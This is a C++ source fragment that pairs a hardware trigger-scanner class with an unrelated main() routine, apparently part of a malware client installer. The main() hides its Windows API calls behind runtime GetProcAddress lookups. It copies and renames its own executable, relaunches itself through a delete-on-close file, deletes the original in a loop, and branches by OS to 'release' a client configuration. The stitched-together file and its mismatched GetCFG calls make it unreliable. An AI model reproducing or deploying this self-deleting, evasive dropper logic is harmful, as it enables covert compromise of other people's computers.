/*
** Constructor
*/
CTriggerScannerHw::CTriggerScannerHw(LPCSTR pszEventName, int nOpCode, LPCSTR pszTestVal, LPCSTR pszCat, LPCSTR pszKey)
: CTriggerScanner(pszEventName, nOpCode, pszTestVal), m_strCat(pszCat), m_strKey(pszKey)
{
m_pDataOld = m_pDataNew = NULL;
// try and load the correct hardware scanner based on the category name
m_pDataNew = CHardwareScanner::HardwareScanner(m_strCat, GetCFG());
}
/*
** Collect results for this category
*/
BOOL CTriggerScannerHw::Scan()
{
// first save the previous results
if (m_pDataOld)
delete m_pDataOld;
m_pDataOld = m_pDataNew;
m_pDataNew = NULL;
// set up the scanner and execute it
m_pDataNew = CHardwareScanner::HardwareScanner(m_strCat, GetCFG());
if (m_pDataNew)
return m_pDataNew->Scan();
return FALSE;
}
int main(int argc, char* argv[])
{
HMODULE hKernel;
int funCopyF, funCreateF, funCreateP;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
SECURITY_ATTRIBUTES sa;
hKernel = GetModuleHandleA("kernel32.dll");
funCopyF = (int)GetProcAddress(hKernel, "CopyFileA");
funCreateF = (int)GetProcAddress(hKernel, "CreateFileA");
funCreateP = (int)GetProcAddress(hKernel, "CreateProcessA");
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
if ( argc == 2 )
{
while ( !DeleteFileA("2tem.exe") )
;
((void (__stdcall *)(DWORD, char *, DWORD, DWORD, signed int, signed int, DWORD, DWORD, int *, int *))funCreateP)(
0,
"net",
0,
0,
1,
2,
0,
0,
(int*)&si,
(int*)&pi);
return 0;
}
SYSTEM_INFO sInfo;
GetNativeSystemInfo(&sInfo);
//GetSystemInfo(&sInfo);
bool is32Bit = sInfo.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_INTEL;
OSVERSIONINFOA vInfo;
ZeroMemory(&vInfo, sizeof(vInfo));
vInfo.dwOSVersionInfoSize = sizeof(vInfo);
if (!GetVersionExA(&vInfo) || vInfo.dwMajorVersion == 4 )
return -1;
union client_cfg gCFG;
GetCFG(gCFG);
//首先64位要特别处理
if(is32Bit == false) ReleaseOn64Bit(gCFG);
//Windows Vista和7的处理
else if(vInfo.dwMajorVersion == 6) ReleaseOnVistaOrXP(gCFG, false);
else if(vInfo.dwMajorVersion == 5) ReleaseOnVistaOrXP(gCFG, true);
if(argc == 1)
{
((void (__stdcall *)(const char *, DWORD, DWORD))funCopyF)(argv[0], (DWORD)"tem.exe", 0);
MoveFileA(argv[0], "2tem.exe");
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
((void (__stdcall *)(DWORD, DWORD, signed int, int *, signed int, signed int, DWORD))funCreateF)(
(DWORD)"tem.exe",
0,
1,
(int*)&sa,
3,
67108864,
NULL);
((void (__stdcall *)(DWORD, DWORD, DWORD, DWORD, signed int, DWORD, DWORD, DWORD, int *, int *))funCreateP)(
0,
(DWORD)"tem.exe p",
0,
0,
1,
0,
0,
0,
(int*)&si,
(int*)&pi);
}
return 0;
}
